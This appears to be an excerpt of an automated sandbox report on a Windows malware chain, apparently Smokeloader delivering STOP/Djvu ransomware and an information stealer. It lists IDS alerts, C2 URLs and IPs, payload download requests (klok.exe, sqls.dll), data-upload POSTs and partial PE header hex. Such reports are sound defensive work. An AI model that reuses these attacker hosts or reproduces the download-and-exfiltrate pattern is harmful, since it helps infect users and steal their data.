Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: E609.exe, 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: build2.exe, 00000013.00000002.2708700605.000000006C8CD000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: HC:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000001A.00000000.2156846013.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, build3.exe, 0000001A.00000002.2242852483.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, build3.exe, 0000001C.00000000.2241978296.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, mstsca.exe, 00000020.00000002.2340193877.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, mstsca.exe, 00000020.00000000.2255717001.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, mstsca.exe, 00000023.00000000.2339511009.0000000000401000.00000020.00000001.01000000.0000000C.sdmp

Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	10_2_00410160
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	10_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	10_2_0040FB98
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,	15_2_0040F730
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_00410160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,	15_2_00410160
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,	15_2_0040FB98

Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49736 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49737 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49738 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49739 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49740 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49741 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49742 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49743 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49745 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49747 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49748 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49749 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49750 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49752 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49753 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.4:49754 -> 189.163.126.89:80
Source: Traffic	Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.4:49754 -> 189.163.126.89:80
Source: Traffic	Snort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.4:49757 -> 213.172.74.157:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49759 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.4:49760 -> 213.172.74.157:80
Source: Traffic	Snort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.4:49760 -> 213.172.74.157:80
Source: Traffic	Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 213.172.74.157:80 -> 192.168.2.4:49757
Source: Traffic	Snort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 213.172.74.157:80 -> 192.168.2.4:49758
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49761 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49763 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49764 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49766 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49767 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49769 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49770 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49774 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49775 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49777 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49778 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49780 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49782 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49784 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49787 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49788 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.4:49789 -> 91.92.253.69:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49797 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49802 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49805 -> 158.160.165.129:80
Source: Traffic	Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49810 -> 158.160.165.129:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 189.163.126.89 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 103.174.152.66 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 193.233.132.167 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.92.253.69 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.154.13.143 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.185.16.114 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 158.160.165.129 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.196.109.209 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 162.159.134.233 443	Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: https://steamcommunity.com/profiles/76561199689717899
Source: Malware configuration extractor	URLs: http://trad-einmyus.com/index.php
Source: Malware configuration extractor	URLs: http://tradein-myus.com/index.php
Source: Malware configuration extractor	URLs: http://trade-inmyus.com/index.php
Source: Malware configuration extractor	URLs: http://cajgtus.com/test1/get.php

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 25 May 2024 19:29:34 GMTContent-Type: application/octet-streamContent-Length: 751104Last-Modified: Sat, 25 May 2024 19:20:05 GMTConnection: closeETag: "665239e5-b7600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c4 2a 01 d0 80 4b 6f 83 80 4b 6f 83 80 4b 6f 83 8d 19 b0 83 9a 4b 6f 83 8d 19 8f 83 f7 4b 6f 83 8d 19 8e 83 a7 4b 6f 83 89 33 fc 83 87 4b 6f 83 80 4b 6e 83 e8 4b 6f 83 35 d5 8e 83 81 4b 6f 83 8d 19 b4 83 81 4b 6f 83 35 d5 b1 83 81 4b 6f 83 52 69 63 68 80 4b 6f 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 25 39 28 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 e4 00 00 00 5c 90 02 00 00 00 00 c7 43 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 91 02 00 04 00 00 45 4f 0c 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 6a 01 00 50 00 00 00 00 80 90 02 68 d2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 54 6a 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 5f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 6c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 e3 00 00 00 10 00 00 00 e4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 48 72 00 00 00 00 01 00 00 74 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 ff 8e 02 00 80 01 00 00 46 09 00 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 68 d2 00 00 00 80 90 02 00 d4 00 00 00 a2 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 25 May 2024 19:29:42 GMTContent-Type: application/octet-streamContent-Length: 232448Last-Modified: Wed, 22 May 2024 09:20:03 GMTConnection: closeETag: "664db8c3-38c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 14 2a 8b 75 75 44 d8 75 75 44 d8 75 75 44 d8 78 27 9b d8 6d 75 44 d8 78 27 a4 d8 03 75 44 d8 78 27 a5 d8 52 75 44 d8 7c 0d d7 d8 72 75 44 d8 75 75 45 d8 11 75 44 d8 c0 eb a1 d8 74 75 44 d8 78 27 9f d8 74 75 44 d8 c0 eb 9a d8 74 75 44 d8 52 69 63 68 75 75 44 d8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 8f f9 5f 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0c 00 00 dc 00 00 00 18 88 02 00 00 00 00 7f 36 00 00 00 10 00 00 00 f0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 89 02 00 04 00 00 5c 36 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bc 50 01 00 50 00 00 00 00 90 88 02 28 77 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 51 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 46 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b3 da 00 00 00 10 00 00 00 dc 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 96 68 00 00 00 f0 00 00 00 6a 00 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 40 20 87 02 00 60 01 00 00 ca 01 00 00 4a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 28 77 00 00 00 90 88 02 00 78 00 00 00 14 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 25 May 2024 19:29:58 GMTServer: Apache/2.4.37 (Win64) PHP/5.6.40Last-Modified: Mon, 09 Oct 2023 19:50:06 GMTETag: "4ae00-6074de5a4a562"Accept-Ranges: bytesContent-Length: 306688Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 36 f8 06 6b 72 99 68 38 72 99 68 38 72 99 68 38 cf d6 fe 38 73 99 68 38 6c cb fd 38 6e 99 68 38 6c cb eb 38 fc 99 68 38 55 5f 13 38 7b 99 68 38 72 99 69 38 c9 99 68 38 6c cb ec 38 32 99 68 38 6c cb fc 38 73 99 68 38 6c cb f9 38 73 99 68 38 52 69 63 68 72 99 68 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0e d2 b9 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6a 03 00 00 98 3b 00 00 00 00 00 20 05 01 00 00 10 00 00 00 80 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 c0 3e 00 00 04 00 00 b0 bf 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 68 03 00 64 00 00 00 00 90 3e 00 00 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 b8 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 72 68 03 00 00 10 00 00 00 6a 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a8 ff 3a 00 00 80 03 00 00 0e 01 00 00 6e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6b 69 63 00 00 00 00 05 00 00 00 00 80 3e 00 00 02 00 00 00 7c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 2f 00 00 00 90 3e 00 00 30 00 00 00 7e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic

HTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View	IP Address: 104.102.42.29 104.102.42.29
Source: Joe Sandbox View	IP Address: 65.109.242.59 65.109.242.59
Source: Joe Sandbox View	IP Address: 193.233.132.167 193.233.132.167
Source: Joe Sandbox View	IP Address: 193.233.132.167 193.233.132.167

Source: Joe Sandbox View	ASN Name: UninetSAdeCVMX UninetSAdeCVMX
Source: Joe Sandbox View	ASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
Source: Joe Sandbox View	ASN Name: AKAMAI-ASUS AKAMAI-ASUS
Source: Joe Sandbox View	ASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU

Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /klok.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.safeautomationbd.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFHDBGIEBFIIDGCBFBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 278Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /TEMPradius.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: nessotechbd.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEHJJECAEGCAAAAEGIEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FCBFBGDBKJKECAAKKFHDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJEBGHIEBFIJKECBKFHDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 6437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DHIJDHIDBGHJKECBFIIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 4677Connection: Keep-AliveCache-Control: no-cache
